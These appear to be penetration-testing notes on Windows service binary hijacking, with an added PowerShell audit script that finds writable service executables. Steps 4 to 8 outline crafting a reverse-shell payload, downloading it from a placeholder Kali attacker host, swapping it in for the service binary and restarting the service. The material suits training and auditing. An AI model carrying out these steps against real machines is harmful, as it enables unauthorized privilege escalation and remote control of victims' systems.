Service Binary Hijacking

1. Get a list of running services

   Get-CimInstance -ClassName win32_service | Select Name, State, PathName | Where-Object {$_.State -like 'Running'}

   NOTE: The following command needs PowerUp.ps1 to be imported first:

   Get-ModifiableServiceFile

2. Check the user's permissions on the binary file

   icacls "<Binary File Full Path>"

   The icacls utility prints each principal together with its permission mask:

   Mask   Permissions
   F      Full access
   M      Modify access
   RX     Read and execute access
   R      Read-only access
   W      Write-only access

3. Find a service binary file to which the user has Full access (F in the icacls output)
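The following PowerShell script is an added audit example, not part of the original notes and not PowerUp code. It performs steps 1 to 3 in a single pass from the defender's side: it enumerates every service, extracts the executable path from PathName (handling quoted paths, unquoted paths with spaces, and trailing arguments), and reports every ACE that grants write-class rights to a principal outside a trusted set. It assumes Windows PowerShell 5.1 or later with no third-party modules; the names Get-ServiceBinaryPath, Find-WritableServiceBinary, $TrustedPrincipals and $WriteMask are the example's own.

```powershell
# Added audit example (not part of the original notes, not PowerUp code).
# Assumes Windows PowerShell 5.1+ and no third-party modules.

# Principals expected to hold write access on service executables; any other
# principal with write-class rights is reported.
$TrustedPrincipals = @(
    'NT AUTHORITY\SYSTEM',
    'BUILTIN\Administrators',
    'NT SERVICE\TrustedInstaller'
)

# Access-mask bits that allow replacing or altering the file:
# FILE_WRITE_DATA (0x2), FILE_APPEND_DATA (0x4), DELETE (0x10000),
# WRITE_DAC (0x40000), WRITE_OWNER (0x80000), plus GENERIC_ALL (0x10000000)
# and GENERIC_WRITE (0x40000000), which some ACEs use instead of specific bits.
$WriteMask = [int64](0x2 -bor 0x4 -bor 0x10000 -bor 0x40000 -bor 0x80000 -bor 0x10000000 -bor 0x40000000)

function Get-ServiceBinaryPath {
    # Extract the executable path from a Win32_Service PathName, which may be
    # quoted, unquoted with spaces, and/or followed by arguments (e.g. -k netsvcs).
    param([string]$PathName)
    if ([string]::IsNullOrWhiteSpace($PathName)) { return $null }
    $p = $PathName.Trim()
    if ($p.StartsWith('"')) {
        $end = $p.IndexOf('"', 1)
        if ($end -gt 1) { return $p.Substring(1, $end - 1) }
        return $null
    }
    # Unquoted: keep everything up to the first ".exe" token so spaces inside
    # the path survive but trailing arguments are dropped.
    $m = [regex]::Match($p, '^(.*?\.exe)(\s|$)', 'IgnoreCase')
    if ($m.Success) { return $m.Groups[1].Value }
    return ($p -split '\s+')[0]
}

function Find-WritableServiceBinary {
    # Walk every service, resolve its executable and report ACEs that give a
    # non-trusted principal write-class rights on that file.
    foreach ($svc in Get-CimInstance -ClassName Win32_Service) {
        $bin = Get-ServiceBinaryPath -PathName $svc.PathName
        if (-not $bin) { continue }
        $bin = [Environment]::ExpandEnvironmentVariables($bin)   # e.g. %SystemRoot%
        if (-not (Test-Path -LiteralPath $bin -PathType Leaf)) { continue }
        try { $acl = Get-Acl -LiteralPath $bin -ErrorAction Stop } catch { continue }
        foreach ($ace in $acl.Access) {
            if ($ace.AccessControlType -ne 'Allow') { continue }
            if ($TrustedPrincipals -contains $ace.IdentityReference.Value) { continue }
            if (([int64]$ace.FileSystemRights -band $WriteMask) -eq 0) { continue }
            [pscustomobject]@{
                Service   = $svc.Name
                State     = $svc.State
                RunsAs    = $svc.StartName
                Binary    = $bin
                Principal = $ace.IdentityReference.Value
                Rights    = $ace.FileSystemRights
            }
        }
    }
}

# Print findings; an empty table means no service executable is writable by
# anyone outside $TrustedPrincipals. Review each hit and tighten the file ACL.
Find-WritableServiceBinary | Sort-Object Service | Format-Table -AutoSize
```

Each row names the service, the account it runs as (a service running as LocalSystem with a binary writable by Users or Authenticated Users is the case the notes above describe), the resolved path, and the offending principal and rights. Unlike the one-off icacls check, the script also catches ACEs expressed with generic rights and services whose PathName carries arguments, and it does not rely on group membership of the account running it.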

4. Craft a payload that returns a reverse shell

5. Download the payload to the target machine

   iwr -Uri http://<Kali IP Address>/<File Name> -OutFile <File Name>

6. Back up the original binary file to the current directory

   move <Binary File Full Path> .\<Binary File Name>

7. Move the payload into the binary file's location

   move .\<File Name> <Binary File Full Path>

8. Restart the service

   Either restart the service itself (this requires permission to stop and start that particular service):

   Stop-Service <Service Name>
   Start-Service <Service Name>

   Or restart the system:

   shutdown /r /t 0

   NOTE: If you want to restart the system, make sure the user has SeShutdownPrivilege.
